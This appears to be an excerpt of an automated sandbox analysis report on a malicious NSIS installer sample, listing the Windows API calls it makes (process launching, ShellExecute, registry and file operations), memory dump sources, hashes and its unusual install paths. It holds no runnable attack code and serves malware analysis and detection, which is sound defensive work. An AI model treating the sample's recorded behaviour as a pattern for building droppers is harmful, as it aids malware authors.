                                                            • Opcode Fuzzy Hash: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                            • Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                            • Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
                                                            • Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                            • Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FEE
                                                              • Part of subcall function 004051AF: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                              • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                              • Part of subcall function 004051AF: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,0040318B), ref: 0040520A
                                                              • Part of subcall function 004051AF: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\), ref: 0040521C
                                                              • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                              • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                              • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                            • String ID: `OC
                                                            • API String ID: 334405425-799166930
                                                            • Opcode ID: 8e94686a10659349c404390c89b8fa7d2236a9bf12bd9f6309b2655a234b5092
                                                            • Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
                                                            • Opcode Fuzzy Hash: 8e94686a10659349c404390c89b8fa7d2236a9bf12bd9f6309b2655a234b5092
                                                            • Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,petrels,NSIS Error), ref: 0040605D
                                                              • Part of subcall function 00405AAF: CharNextW.USER32(?,?,C:\,?,00405B23,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                              • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                              • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                            • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
                                                            • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 3248276644-263117582
                                                            • Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                            • Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
                                                            • Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                            • Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Remove folder: ,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00405F47
                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00405F68
                                                            • RegCloseKey.ADVAPI32(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00405F8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Remove folder:
                                                            • API String ID: 3677997916-1958208860
                                                            • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                            • Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
                                                            • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                            • Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004051AF: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                              • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                              • Part of subcall function 004051AF: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,0040318B), ref: 0040520A
                                                              • Part of subcall function 004051AF: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\), ref: 0040521C
                                                              • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                              • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                              • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                              • Part of subcall function 00405730: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                              • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 3585118688-0
                                                            • Opcode ID: c1ff62ea5870f37ba207307ce747ee3e83c7963594fadc4a02c24a9320e89dea
                                                            • Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
                                                            • Opcode Fuzzy Hash: c1ff62ea5870f37ba207307ce747ee3e83c7963594fadc4a02c24a9320e89dea
                                                            • Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00405AAF: CharNextW.USER32(?,?,C:\,?,00405B23,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                              • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                              • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                              • Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen,?,00000000,000000F0), ref: 00401645
                                                            Strings
                                                            • C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen, xrefs: 00401638
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen
                                                            • API String ID: 1892508949-3772440268
                                                            • Opcode ID: 8eed11a8c4a13b92a639225a237284c8caa45ee048a67b37853bce612d5118c5
                                                            • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                            • Opcode Fuzzy Hash: 8eed11a8c4a13b92a639225a237284c8caa45ee048a67b37853bce612d5118c5
                                                            • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                            • CloseHandle.KERNEL32(?), ref: 00405766
                                                            Strings
                                                            • Error launching installer, xrefs: 00405743
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID: Error launching installer
                                                            • API String ID: 3712363035-66219284
                                                            • Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                            • Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
                                                            • Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                            • Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                            • RegCloseKey.KERNELBASE(?,?,?,%trrelofternes%\Kompletteringernes.mov,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Enum$CloseOpenValue
                                                            • String ID:
                                                            • API String ID: 167947723-0
                                                            • Opcode ID: 58791b35822ebf987f34c85fd11d5e7110b4779ceafcebdb4e355afaf954f7bb
                                                            • Instruction ID: f1a23a851f53a7f1557dfd10c54e6723b1dbb9afb6220ffeee8eb14207b379e7
                                                            • Opcode Fuzzy Hash: 58791b35822ebf987f34c85fd11d5e7110b4779ceafcebdb4e355afaf954f7bb
                                                            • Instruction Fuzzy Hash: 2BF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00405C00: GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
                                                              • Part of subcall function 00405C00: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405C19
                                                            • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,004059DB), ref: 00405814
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,004059DB), ref: 0040581C
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405834
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                            • String ID:
                                                            • API String ID: 1655745494-0
                                                            • Opcode ID: 3b9797689a03f95fa73e808d9158a6ce270ec7ab373d63a1b8944fb900d208e7
                                                            • Instruction ID: 062e4e20f3a54eeddd8893063cbebae18cfd109c575b60be97cf76840fed1b59
                                                            • Opcode Fuzzy Hash: 3b9797689a03f95fa73e808d9158a6ce270ec7ab373d63a1b8944fb900d208e7
                                                            • Instruction Fuzzy Hash: C6E06533119A9056C3107734590C75F2A98DFD6319F05993EFD92B11D0C778485A8AAE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen,?), ref: 00401E52
                                                            Strings
                                                            • C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen, xrefs: 00401E3B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
